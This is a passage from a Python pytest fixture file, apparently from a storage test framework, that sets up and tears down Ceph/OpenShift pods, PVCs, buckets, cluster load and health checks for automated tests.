sa_name=instance.name, namespace=instance.namespace
)
instance.delete()
instance.ocp.wait_for_delete(resource_name=instance.name)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def dc_pod_factory(request, pvc_factory, service_account_factory):
"""
Create deploymentconfig pods
"""
instances = []
def factory(
interface=constants.CEPHBLOCKPOOL,
pvc=None,
service_account=None,
size=None,
custom_data=None,
node_name=None,
node_selector=None,
replica_count=1,
raw_block_pv=False,
sa_obj=None,
wait=True,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
pvc (PVC object): ocs_ci.ocs.resources.pvc.PVC instance kind.
service_account (str): service account name for dc_pods
size (int): The requested size for the PVC
custom_data (dict): If provided then Pod object is created
by using these data. Parameter `pvc` is not used but reference
is set if provided.
node_name (str): The name of specific node to schedule the pod
node_selector (dict): dict of key-value pair to be used for nodeSelector field
eg: {'nodetype': 'app-pod'}
replica_count (int): Replica count for deployment config
raw_block_pv (str): True if pod with raw block pvc
sa_obj (object) : If specific service account is needed
"""
if custom_data:
dc_pod_obj = helpers.create_resource(**custom_data)
else:
pvc = pvc or pvc_factory(interface=interface, size=size)
sa_obj = sa_obj or service_account_factory(
project=pvc.project, service_account=service_account
)
dc_pod_obj = helpers.create_pod(
interface_type=interface,
pvc_name=pvc.name,
do_reload=False,
namespace=pvc.namespace,
sa_name=sa_obj.name,
dc_deployment=True,
replica_count=replica_count,
node_name=node_name,
node_selector=node_selector,
raw_block_pv=raw_block_pv,
pod_dict_path=constants.FEDORA_DC_YAML,
)
instances.append(dc_pod_obj)
log.info(dc_pod_obj.name)
if wait:
helpers.wait_for_resource_state(
dc_pod_obj, constants.STATUS_RUNNING, timeout=180
)
dc_pod_obj.pvc = pvc
return dc_pod_obj
def finalizer():
"""
Delete dc pods
"""
for instance in instances:
delete_deploymentconfig_pods(instance)
request.addfinalizer(finalizer)
return factory
@pytest.fixture(scope="session", autouse=True)
def polarion_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures polarion testsuite properties for junit xml
"""
polarion_project_id = config.REPORTING["polarion"]["project_id"]
record_testsuite_property("polarion-project-id", polarion_project_id)
jenkins_build_url = config.RUN.get("jenkins_build_url")
if jenkins_build_url:
record_testsuite_property("polarion-custom-description", jenkins_build_url)
polarion_testrun_name = get_testrun_name()
record_testsuite_property("polarion-testrun-id", polarion_testrun_name)
record_testsuite_property("polarion-testrun-status-id", "inprogress")
record_testsuite_property("polarion-custom-isautomated", "True")
@pytest.fixture(scope="session", autouse=True)
def additional_testsuite_properties(record_testsuite_property, pytestconfig):
"""
Configures additional custom testsuite properties for junit xml
"""
# add logs url
logs_url = config.RUN.get("logs_url")
if logs_url:
record_testsuite_property("logs-url", logs_url)
# add run_id
record_testsuite_property("run_id", config.RUN["run_id"])
# Report Portal
launch_name = reporting.get_rp_launch_name()
record_testsuite_property("rp_launch_name", launch_name)
launch_description = reporting.get_rp_launch_description()
record_testsuite_property("rp_launch_description", launch_description)
attributes = reporting.get_rp_launch_attributes()
for key, value in attributes.items():
# Prefix with `rp_` so the rp_preproc upload script knows to use the property
record_testsuite_property(f"rp_{key}", value)
launch_url = config.REPORTING.get("rp_launch_url")
if launch_url:
record_testsuite_property("rp_launch_url", launch_url)
@pytest.fixture(scope="session")
def tier_marks_name():
"""
Gets the tier mark names
Returns:
list: list of tier mark names
"""
tier_marks_name = []
for each_tier in tier_marks:
try:
tier_marks_name.append(each_tier.name)
except AttributeError:
tier_marks_name.append(each_tier().args[0].name)
return tier_marks_name
@pytest.fixture(scope="function", autouse=True)
def health_checker(request, tier_marks_name):
skipped = False
dev_mode = config.RUN["cli_params"].get("dev_mode")
if dev_mode:
log.info("Skipping health checks for development mode")
return
def finalizer():
if not skipped:
try:
teardown = config.RUN["cli_params"]["teardown"]
skip_ocs_deployment = config.ENV_DATA["skip_ocs_deployment"]
if not (teardown or skip_ocs_deployment):
ceph_health_check_base()
log.info("Ceph health check passed at teardown")
except CephHealthException:
log.info("Ceph health check failed at teardown")
# Retrying to increase the chance the cluster health will be OK
# for next test
ceph_health_check()
raise
node = request.node
request.addfinalizer(finalizer)
for mark in node.iter_markers():
if mark.name in tier_marks_name:
log.info("Checking for Ceph Health OK ")
try:
status = ceph_health_check_base()
if status:
log.info("Ceph health check passed at setup")
return
except CephHealthException:
skipped = True
# skip because ceph is not in good health
pytest.skip("Ceph health check failed at setup")
@pytest.fixture(scope="session", autouse=True)
def cluster(request, log_cli_level):
"""
This fixture initiates deployment for both OCP and OCS clusters.
Specific platform deployment classes will handle the fine details
of action
"""
log.info(f"All logs located at {ocsci_log_path()}")
teardown = config.RUN["cli_params"]["teardown"]
deploy = config.RUN["cli_params"]["deploy"]
if teardown or deploy:
factory = dep_factory.DeploymentFactory()
deployer = factory.get_deployment()
# Add a finalizer to teardown the cluster after test execution is finished
if teardown:
def cluster_teardown_finalizer():
# If KMS is configured, clean up the backend resources
# we are doing it before OCP cleanup
if config.DEPLOYMENT.get("kms_deployment"):
kms = KMS.get_kms_deployment()
kms.cleanup()
deployer.destroy_cluster(log_cli_level)
request.addfinalizer(cluster_teardown_finalizer)
log.info("Will teardown cluster because --teardown was provided")
# Download client
if config.DEPLOYMENT["skip_download_client"]:
log.info("Skipping client download")
else:
force_download = (
config.RUN["cli_params"].get("deploy")
and config.DEPLOYMENT["force_download_client"]
)
get_openshift_client(force_download=force_download)
# set environment variable for early testing of RHCOS
if config.ENV_DATA.get("early_testing"):
release_img = config.ENV_DATA["RELEASE_IMG"]
log.info(f"Running early testing of RHCOS with release image: {release_img}")
os.environ["RELEASE_IMG"] = release_img
os.environ["OPENSHIFT_INSTALL_RELEASE_IMAGE_OVERRIDE"] = release_img
if deploy:
# Deploy cluster
deployer.deploy_cluster(log_cli_level)
else:
if config.ENV_DATA["platform"] == constants.IBMCLOUD_PLATFORM:
ibmcloud.login()
@pytest.fixture(scope="class")
def environment_checker(request):
node = request.node
# List of marks for which we will ignore the leftover checker
marks_to_ignore = [m.mark for m in [deployment, ignore_leftovers]]
# app labels of resources to be excluded for leftover check
exclude_labels = [constants.must_gather_pod_label]
for mark in node.iter_markers():
if mark in marks_to_ignore:
return
if mark.name == ignore_leftover_label.name:
exclude_labels.extend(list(mark.args))
request.addfinalizer(
partial(get_status_after_execution, exclude_labels=exclude_labels)
)
get_status_before_execution(exclude_labels=exclude_labels)
@pytest.fixture(scope="session")
def log_cli_level(pytestconfig):
"""
Retrieves the log_cli_level set in pytest.ini
Returns:
str: log_cli_level set in pytest.ini or DEBUG if not set
"""
return pytestconfig.getini("log_cli_level") or "DEBUG"
@pytest.fixture(scope="session", autouse=True)
def cluster_load(
request,
project_factory_session,
pvc_factory_session,
service_account_factory_session,
pod_factory_session,
):
"""
Run IO during the test execution
"""
cl_load_obj = None
io_in_bg = config.RUN.get("io_in_bg")
log_utilization = config.RUN.get("log_utilization")
io_load = config.RUN.get("io_load")
cluster_load_error = None
cluster_load_error_msg = (
"Cluster load might not work correctly during this run, because "
"it failed with an exception: %s"
)
# IO load should not happen during deployment
deployment_test = (
True if ("deployment" in request.node.items[0].location[0]) else False
)
if io_in_bg and not deployment_test:
io_load = int(io_load) * 0.01
log.info(wrap_msg("Tests will be running while IO is in the background"))
log.info(
"Start running IO in the background. The amount of IO that "
"will be written is going to be determined by the cluster "
"capabilities according to its limit"
)
try:
cl_load_obj = ClusterLoad(
project_factory=project_factory_session,
sa_factory=service_account_factory_session,
pvc_factory=pvc_factory_session,
pod_factory=pod_factory_session,
target_percentage=io_load,
)
cl_load_obj.reach_cluster_load_percentage()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
if (log_utilization or io_in_bg) and not deployment_test:
if not cl_load_obj:
try:
cl_load_obj = ClusterLoad()
except Exception as ex:
log.error(cluster_load_error_msg, ex)
cluster_load_error = ex
config.RUN["load_status"] = "running"
def finalizer():
"""
Stop the thread that executed watch_load()
"""
config.RUN["load_status"] = "finished"
if thread:
thread.join()
if cluster_load_error:
raise cluster_load_error
request.addfinalizer(finalizer)
def watch_load():
"""
Watch the cluster load by monitoring the cluster latency.
Print the cluster utilization metrics every 15 seconds.
If IOs are running in the test background, dynamically adjust
the IO load based on the cluster latency.
"""
while config.RUN["load_status"] != "finished":
time.sleep(20)
try:
cl_load_obj.print_metrics(mute_logs=True)
if io_in_bg:
if config.RUN["load_status"] == "running":
cl_load_obj.adjust_load_if_needed()
elif config.RUN["load_status"] == "to_be_paused":
cl_load_obj.reduce_load(pause=True)
config.RUN["load_status"] = "paused"
elif config.RUN["load_status"] == "to_be_reduced":
cl_load_obj.reduce_load(pause=False)
config.RUN["load_status"] = "reduced"
elif config.RUN["load_status"] == "to_be_resumed":
cl_load_obj.resume_load()
config.RUN["load_status"] = "running"
# Any type of exception should be caught and we should continue.
# We don't want any test to fail
except Exception:
continue
thread = threading.Thread(target=watch_load)
thread.start()
def resume_cluster_load_implementation():
"""
Resume cluster load implementation
"""
config.RUN["load_status"] = "to_be_resumed"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status == "running":
break
except TimeoutExpiredError:
log.error("Cluster load was not resumed successfully")
def reduce_cluster_load_implementation(request, pause, resume=True):
"""
Pause/reduce the background cluster load
Args:
pause (bool): True for completely pausing the cluster load, False for reducing it by 50%
resume (bool): True for resuming the cluster load upon teardown, False for not resuming
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
if resume:
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
config.RUN["load_status"] = "to_be_paused" if pause else "to_be_reduced"
try:
for load_status in TimeoutSampler(300, 3, config.RUN.get, "load_status"):
if load_status in ["paused", "reduced"]:
break
except TimeoutExpiredError:
log.error(
f"Cluster load was not {'paused' if pause else 'reduced'} successfully"
)
@pytest.fixture()
def pause_cluster_load(request):
"""
Pause the background cluster load without resuming it
"""
reduce_cluster_load_implementation(request=request, pause=True, resume=False)
@pytest.fixture()
def resume_cluster_load(request):
"""
Resume the background cluster load
"""
if config.RUN.get("io_in_bg"):
def finalizer():
"""
Resume the cluster load
"""
resume_cluster_load_implementation()
request.addfinalizer(finalizer)
@pytest.fixture()
def pause_and_resume_cluster_load(request):
"""
Pause the background cluster load and resume it in teardown to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=True)
@pytest.fixture()
def reduce_and_resume_cluster_load(request):
"""
Reduce the background cluster load to be 50% of what it is and resume the load in teardown
to the original load value
"""
reduce_cluster_load_implementation(request=request, pause=False)
@pytest.fixture(
params=[
pytest.param({"interface": constants.CEPHBLOCKPOOL}),
pytest.param({"interface": constants.CEPHFILESYSTEM}),
],
ids=["RBD", "CephFS"],
)
def interface_iterate(request):
"""
Iterate over interfaces - CephBlockPool and CephFileSystem
"""
return request.param["interface"]
@pytest.fixture(scope="class")
def multi_pvc_factory_class(project_factory_class, pvc_factory_class):
return multi_pvc_factory_fixture(project_factory_class, pvc_factory_class)
@pytest.fixture(scope="session")
def multi_pvc_factory_session(project_factory_session, pvc_factory_session):
return multi_pvc_factory_fixture(project_factory_session, pvc_factory_session)
@pytest.fixture(scope="function")
def multi_pvc_factory(project_factory, pvc_factory):
return multi_pvc_factory_fixture(project_factory, pvc_factory)
def multi_pvc_factory_fixture(project_factory, pvc_factory):
"""
Create a Persistent Volume Claims factory. Calling this fixture creates a
set of new PVCs. Options for PVC creation based on provided assess modes:
1. For each PVC, choose random value from the list of access modes
2. Create PVCs based on the specified distribution number of access modes.
Create sets of PVCs based on the order of access modes.
3. Create PVCs based on the specified distribution number of access modes.
The order of PVC creation is independent of access mode.
"""
def factory(
interface=constants.CEPHBLOCKPOOL,
project=None,
storageclass=None,
size=None,
access_modes=None,
access_modes_selection="distribute_sequential",
access_mode_dist_ratio=None,
status=constants.STATUS_BOUND,
num_of_pvc=1,
wait_each=False,
timeout=60,
):
"""
Args:
interface (str): CephBlockPool or CephFileSystem. This decides
whether a RBD based or CephFS resource is created.
RBD is default.
project (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'Project' kind.
storageclass (object): ocs_ci.ocs.resources.ocs.OCS instance
of 'StorageClass' kind.
size (int): The requested size for the PVC
access_modes (list): List of access modes. One of the access modes
will be chosen for creating each PVC. If not specified,
ReadWriteOnce will be selected for all PVCs. To specify
volume mode, append volume mode in the access mode name
separated by '-'.
eg: ['ReadWriteOnce', 'ReadOnlyMany', 'ReadWriteMany',
'ReadWriteMany-Block']
access_modes_selection (str): Decides how to select accessMode for
each PVC from the options given in 'access_modes' list.
Values are 'select_random', 'distribute_random'
'select_random' : While creating each PVC, one access mode will
be selected from the 'access_modes' list.
'distribute_random' : The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will not be based on the access modes. For example, 1st and
6th PVC might have same access mode.
'distribute_sequential' :The access modes in the list
'access_modes' will be distributed based on the values in
'distribute_ratio' and the order in which PVCs are created
will be as sets of PVCs of same assess mode. For example,
first set of 10 will be having same access mode followed by
next set of 13 with a different access mode.
access_mode_dist_ratio (list): Contains the number of PVCs to be
created for each access mode. If not specified, the given list
of access modes will be equally distributed among the PVCs.
eg: [10,12] for num_of_pvc=22 and
access_modes=['ReadWriteOnce', 'ReadWriteMany']
status (str): If provided then factory waits for object to reach
desired state.
num_of_pvc(int): Number of PVCs to be created
wait_each(bool): True to wait for each PVC to be in status 'status'
before creating next PVC, False otherwise
timeout(int): Time in seconds to wait
Returns:
list: objects of PVC class.
"""
pvc_list = []
if wait_each:
status_tmp = status
else:
status_tmp = ""
project = project or project_factory()
storageclass = storageclass or helpers.default_storage_class(
interface_type=interface
)
access_modes = access_modes or [constants.ACCESS_MODE_RWO]
access_modes_list = []
if access_modes_selection == "select_random":
for _ in range(num_of_pvc):
mode = random.choice(access_modes)
access_modes_list.append(mode)
else:
if not access_mode_dist_ratio:
num_of_modes = len(access_modes)
dist_val = floor(num_of_pvc / num_of_modes)
access_mode_dist_ratio = [dist_val] * num_of_modes
access_mode_dist_ratio[-1] = dist_val + (num_of_pvc % num_of_modes)
zipped_share = list(zip(access_modes, access_mode_dist_ratio))
for mode, share in zipped_share:
access_modes_list.extend([mode] * share)
if access_modes_selection == "distribute_random":
random.shuffle(access_modes_list)
for access_mode in access_modes_list:
if "-" in access_mode:
access_mode, volume_mode = access_mode.split("-")
else:
volume_mode = ""
pvc_obj = pvc_factory(
interface=interface,
project=project,
storageclass=storageclass,
size=size,
access_mode=access_mode,
status=status_tmp,
volume_mode=volume_mode,
)
pvc_list.append(pvc_obj)
pvc_obj.project = project
if status and not wait_each:
for pvc_obj in pvc_list:
helpers.wait_for_resource_state(pvc_obj, status, timeout=timeout)
return pvc_list
return factory
@pytest.fixture(scope="function")
def memory_leak_function(request):
"""
Function to start Memory leak thread which will be executed parallel with test run
Memory leak data will be captured in all worker nodes for ceph-osd process
Data will be appended in /tmp/(worker)-top-output.txt file for each worker
During teardown created tmp files will be deleted
Usage:
test_case(.., memory_leak_function):
.....
median_dict = helpers.get_memory_leak_median_value()
.....
TC execution part, memory_leak_fun will capture data
....
helpers.memory_leak_analysis(median_dict)
....
"""
def finalizer():
"""
Finalizer to stop memory leak data capture thread and cleanup the files
"""
set_flag_status("terminated")
try:
for status in TimeoutSampler(90, 3, get_flag_status):
if status == "terminated":
break
except TimeoutExpiredError:
log.warning(
"Background test execution still in progress before"
"memory leak thread terminated"
)
if thread:
thread.join()
log_path = ocsci_log_path()
for worker in node.get_worker_nodes():
if os.path.exists(f"/tmp/{worker}-top-output.txt"):
copyfile(
f"/tmp/{worker}-top-output.txt",
f"{log_path}/{worker}-top-output.txt",
)
os.remove(f"/tmp/{worker}-top-output.txt")
log.info("Memory leak capture has stopped")
request.addfinalizer(finalizer)
temp_file = tempfile.NamedTemporaryFile(
mode="w+", prefix="test_status", delete=False
)
def get_flag_status():
with open(temp_file.name, "r") as t_file:
return t_file.readline()
def set_flag_status(value):
with open(temp_file.name, "w") as t_file:
t_file.writelines(value)
set_flag_status("running")
def run_memory_leak_in_bg():
"""
Function to run memory leak in background thread
Memory leak data is written in below format
date time PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
"""
oc = ocp.OCP(namespace=config.ENV_DATA["cluster_namespace"])
while get_flag_status() == "running":
for worker in node.get_worker_nodes():
filename = f"/tmp/{worker}-top-output.txt"
top_cmd = f"debug nodes/{worker} -- chroot /host top -n 2 b"
with open("/tmp/file.txt", "w+") as temp:
temp.write(
str(oc.exec_oc_cmd(command=top_cmd, out_yaml_format=False))
)
temp.seek(0)
for line in temp:
if line.__contains__("ceph-osd"):
with open(filename, "a+") as f:
f.write(str(datetime.now()))
f.write(" ")
f.write(line)
log.info("Start memory leak data capture in the test background")
thread = threading.Thread(target=run_memory_leak_in_bg)
thread.start()
@pytest.fixture()
def aws_obj():
"""
Initialize AWS instance
Returns:
AWS: An instance of AWS class
"""
aws_obj = aws.AWS()
return aws_obj
@pytest.fixture()
def ec2_instances(request, aws_obj):
"""
Get cluster instances
Returns:
dict: The ID keys and the name values of the instances
"""
# Get all cluster nodes objects
nodes = node.get_node_objs()
# Get the cluster nodes ec2 instances
ec2_instances = aws.get_instances_ids_and_names(nodes)
assert (
ec2_instances
), f"Failed to get ec2 instances for node {[n.name for n in nodes]}"
def finalizer():
"""
Make sure all instances are running
"""
# Getting the instances that are in status 'stopping' (if there are any), to wait for them to
# get to status 'stopped' so it will be possible to start them
stopping_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPING)
}
# Waiting fot the instances that are in status 'stopping'
# (if there are any) to reach 'stopped'
if stopping_instances:
for stopping_instance in stopping_instances:
instance = aws_obj.get_ec2_instance(stopping_instance.key())
instance.wait_until_stopped()
stopped_instances = {
key: val
for key, val in ec2_instances.items()
if (aws_obj.get_instances_status_by_id(key) == constants.INSTANCE_STOPPED)
}
# Start the instances
if stopped_instances:
aws_obj.start_ec2_instances(instances=stopped_instances, wait=True)
request.addfinalizer(finalizer)
return ec2_instances
@pytest.fixture(scope="session")
def cld_mgr(request, rgw_endpoint):
"""
Returns a cloud manager instance that'll be used throughout the session
Returns:
CloudManager: A CloudManager resource
"""
cld_mgr = CloudManager()
def finalizer():
for client in vars(cld_mgr):
try:
getattr(cld_mgr, client).secret.delete()
except AttributeError:
log.info(f"{client} secret not found")
request.addfinalizer(finalizer)
return cld_mgr
@pytest.fixture()
def rgw_obj(request):
return rgw_obj_fixture(request)
@pytest.fixture(scope="session")
def rgw_obj_session(request):
return rgw_obj_fixture(request)
def rgw_obj_fixture(request):
"""
Returns an RGW resource that represents RGW in the cluster
Returns:
RGW: An RGW resource
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
return RGW()
else:
return None
@pytest.fixture()
def rgw_deployments(request):
"""
Return RGW deployments or skip the test.
"""
rgw_deployments = get_deployments_having_label(
label=constants.RGW_APP_LABEL, namespace=config.ENV_DATA["cluster_namespace"]
)
if rgw_deployments:
# Force-skipping in case of IBM Cloud -
# https://github.com/red-hat-storage/ocs-ci/issues/3863
if config.ENV_DATA["platform"].lower() == constants.IBMCLOUD_PLATFORM:
pytest.skip(
"RGW deployments were found, but test will be skipped because of BZ1926831"
)
return rgw_deployments
else:
pytest.skip("There is no RGW deployment available for this test.")
@pytest.fixture(scope="session")
def rgw_endpoint(request):
"""
Expose RGW service and return external RGW endpoint address if available.
Returns:
string: external RGW endpoint
"""
log.info("Looking for RGW service to expose")
oc = ocp.OCP(kind=constants.SERVICE, namespace=config.ENV_DATA["cluster_namespace"])
rgw_service = oc.get(selector=constants.RGW_APP_LABEL)["items"]
if rgw_service:
if config.DEPLOYMENT["external_mode"]:
rgw_service = constants.RGW_SERVICE_EXTERNAL_MODE
else:
rgw_service = constants.RGW_SERVICE_INTERNAL_MODE
log.info(f"Service {rgw_service} found and will be exposed")
# custom hostname is provided because default hostname from rgw service
# is too long and OCP rejects it
oc = ocp.OCP(
kind=constants.ROUTE, namespace=config.ENV_DATA["cluster_namespace"]
)
route = oc.get(resource_name="noobaa-mgmt")
router_hostname = route["status"]["ingress"][0]["routerCanonicalHostname"]
rgw_hostname = f"rgw.{router_hostname}"
try:
oc.exec_oc_cmd(f"expose service/{rgw_service} --hostname {rgw_hostname}")
except CommandFailed as cmdfailed:
if "AlreadyExists" in str(cmdfailed):
log.warning("RGW route already exists.")
# new route is named after service
rgw_endpoint = oc.get(resource_name=rgw_service)
endpoint_obj = OCS(**rgw_endpoint)
def _finalizer():
endpoint_obj.delete()
request.addfinalizer(_finalizer)
return f"http://{rgw_hostname}"
else:
log.info("RGW service is not available")
@pytest.fixture()
def mcg_obj(request):
return mcg_obj_fixture(request)
@pytest.fixture(scope="session")
def mcg_obj_session(request):
return mcg_obj_fixture(request)
def mcg_obj_fixture(request, *args, **kwargs):
"""
Returns an MCG resource that's connected to the S3 endpoint
Returns:
MCG: An MCG resource
"""
if config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM:
log.warning("As openshift dedicated is used, no MCG resource is returned")
return None
mcg_obj = MCG(*args, **kwargs)
def finalizer():
if config.ENV_DATA["platform"].lower() == "aws":
mcg_obj.cred_req_obj.delete()
if kwargs.get("create_aws_creds"):
request.addfinalizer(finalizer)
return mcg_obj
@pytest.fixture()
def awscli_pod(request):
return awscli_pod_fixture(request, scope_name="function")
@pytest.fixture(scope="session")
def awscli_pod_session(request):
return awscli_pod_fixture(request, scope_name="session")
def awscli_pod_fixture(request, scope_name):
"""
Creates a new AWSCLI pod for relaying commands
Args:
scope_name (str): The name of the fixture's scope,
used for giving a descriptive name to the pod and configmap
Returns:
pod: A pod running the AWS CLI
"""
# Create the service-ca configmap to be mounted upon pod creation
service_ca_data = templating.load_yaml(constants.AWSCLI_SERVICE_CA_YAML)
service_ca_configmap_name = create_unique_resource_name(
constants.AWSCLI_SERVICE_CA_CONFIGMAP_NAME, scope_name
)
service_ca_data["metadata"]["name"] = service_ca_configmap_name
log.info("Trying to create the AWS CLI service CA")
service_ca_configmap = helpers.create_resource(**service_ca_data)
arch = get_system_architecture()
if arch.startswith("x86"):
pod_dict_path = constants.AWSCLI_POD_YAML
else:
pod_dict_path = constants.AWSCLI_MULTIARCH_POD_YAML
awscli_pod_dict = templating.load_yaml(pod_dict_path)
awscli_pod_dict["spec"]["volumes"][0]["configMap"][
"name"
] = service_ca_configmap_name
awscli_pod_name = create_unique_resource_name(
constants.AWSCLI_RELAY_POD_NAME, scope_name
)
awscli_pod_dict["metadata"]["name"] = awscli_pod_name
update_container_with_mirrored_image(awscli_pod_dict)
awscli_pod_obj = Pod(**awscli_pod_dict)
assert awscli_pod_obj.create(
do_reload=True
), f"Failed to create Pod {awscli_pod_name}"
OCP(namespace=defaults.ROOK_CLUSTER_NAMESPACE, kind="ConfigMap").wait_for_resource(
resource_name=service_ca_configmap.name, column="DATA", condition="1"
)
helpers.wait_for_resource_state(awscli_pod_obj, constants.STATUS_RUNNING)
def _awscli_pod_cleanup():
awscli_pod_obj.delete()
service_ca_configmap.delete()
request.addfinalizer(_awscli_pod_cleanup)
return awscli_pod_obj
@pytest.fixture()
def test_directory_setup(request, awscli_pod_session):
return test_directory_setup_fixture(request, awscli_pod_session)
def test_directory_setup_fixture(request, awscli_pod_session):
origin_dir, result_dir = setup_pod_directories(
awscli_pod_session, ["origin", "result"]
)
SetupDirs = namedtuple("SetupDirs", "origin_dir, result_dir")
def dir_cleanup():
test_name = get_current_test_name()
awscli_pod_session.exec_cmd_on_pod(command=f"rm -rf {test_name}")
request.addfinalizer(dir_cleanup)
return SetupDirs(origin_dir=origin_dir, result_dir=result_dir)
@pytest.fixture()
def nodes():
"""
Return an instance of the relevant platform nodes class
(e.g. AWSNodes, VMWareNodes) to be later used in the test
for nodes related operations, like nodes restart,
detach/attach volume, etc.
"""
factory = platform_nodes.PlatformNodesFactory()
nodes = factory.get_nodes_platform()
return nodes
@pytest.fixture()
def uploaded_objects(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
return uploaded_objects_fixture(
request, mcg_obj, awscli_pod, verify_rgw_restart_count
)
@pytest.fixture(scope="session")
def uploaded_objects_session(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
):
return uploaded_objects_fixture(
request, mcg_obj_session, awscli_pod_session, verify_rgw_restart_count_session
)
def uploaded_objects_fixture(request, mcg_obj, awscli_pod, verify_rgw_restart_count):
"""
Deletes all objects that were created as part of the test
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
awscli_pod (Pod): A pod running the AWSCLI tools
Returns:
list: An empty list of objects
"""
uploaded_objects_paths = []
def object_cleanup():
for uploaded_filename in uploaded_objects_paths:
log.info(f"Deleting object {uploaded_filename}")
awscli_pod.exec_cmd_on_pod(
command=craft_s3_command("rm " + uploaded_filename, mcg_obj),
secrets=[
mcg_obj.access_key_id,
mcg_obj.access_key,
mcg_obj.s3_internal_endpoint,
],
)
request.addfinalizer(object_cleanup)
return uploaded_objects_paths
@pytest.fixture()
def verify_rgw_restart_count(request):
return verify_rgw_restart_count_fixture(request)
@pytest.fixture(scope="session")
def verify_rgw_restart_count_session(request):
return verify_rgw_restart_count_fixture(request)
def verify_rgw_restart_count_fixture(request):
"""
Verifies the RGW restart count at start and end of a test
"""
if config.ENV_DATA["platform"].lower() in constants.ON_PREM_PLATFORMS:
log.info("Getting RGW pod restart count before executing the test")
initial_counts = get_rgw_restart_counts()
def finalizer():
rgw_pods = get_rgw_pods()
for rgw_pod in rgw_pods:
rgw_pod.reload()
log.info("Verifying whether RGW pods changed after executing the test")
for rgw_pod in rgw_pods:
assert rgw_pod.restart_count in initial_counts, "RGW pod restarted"
request.addfinalizer(finalizer)
@pytest.fixture()
def rgw_bucket_factory(request, rgw_obj):
if rgw_obj:
return bucket_factory_fixture(request, rgw_obj=rgw_obj)
else:
return None
@pytest.fixture(scope="session")
def rgw_bucket_factory_session(request, rgw_obj_session):
if rgw_obj_session:
return bucket_factory_fixture(request, rgw_obj=rgw_obj_session)
else:
return None
@pytest.fixture()
def bucket_factory(request, bucket_class_factory, mcg_obj):
"""
Returns an MCG bucket factory.
If MCG object not found returns None
"""
if mcg_obj:
return bucket_factory_fixture(request, bucket_class_factory, mcg_obj)
else:
return None
@pytest.fixture(scope="session")
def bucket_factory_session(request, bucket_class_factory_session, mcg_obj_session):
"""
Returns a session-scoped MCG bucket factory.
If session-scoped MCG object not found returns None
"""
if mcg_obj_session:
return bucket_factory_fixture(
request, bucket_class_factory_session, mcg_obj_session
)
else:
return None
def bucket_factory_fixture(
request, bucket_class_factory=None, mcg_obj=None, rgw_obj=None
):
"""
Create a bucket factory. Calling this fixture creates a new bucket(s).
For a custom amount, provide the 'amount' parameter.
***Please note***
Creation of buckets by utilizing the S3 interface *does not* support bucketclasses.
Only OC/CLI buckets can support different bucketclasses.
By default, all S3 buckets utilize the default bucketclass.
Args:
bucket_class_factory: creates a new Bucket Class
mcg_obj (MCG): An MCG object containing the MCG S3 connection
credentials
rgw_obj (RGW): An RGW object
"""
created_buckets = []
def _create_buckets(
amount=1,
interface="S3",
verify_health=True,
bucketclass=None,
replication_policy=None,
*args,
**kwargs,
):
"""
Creates and deletes all buckets that were created as part of the test
Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_Health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if bucketclass:
interface = bucketclass["interface"]
current_call_created_buckets = []
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for _ in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
replication_policy=replication_policy,
*args,
**kwargs,
)
current_call_created_buckets.append(created_bucket)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return current_call_created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
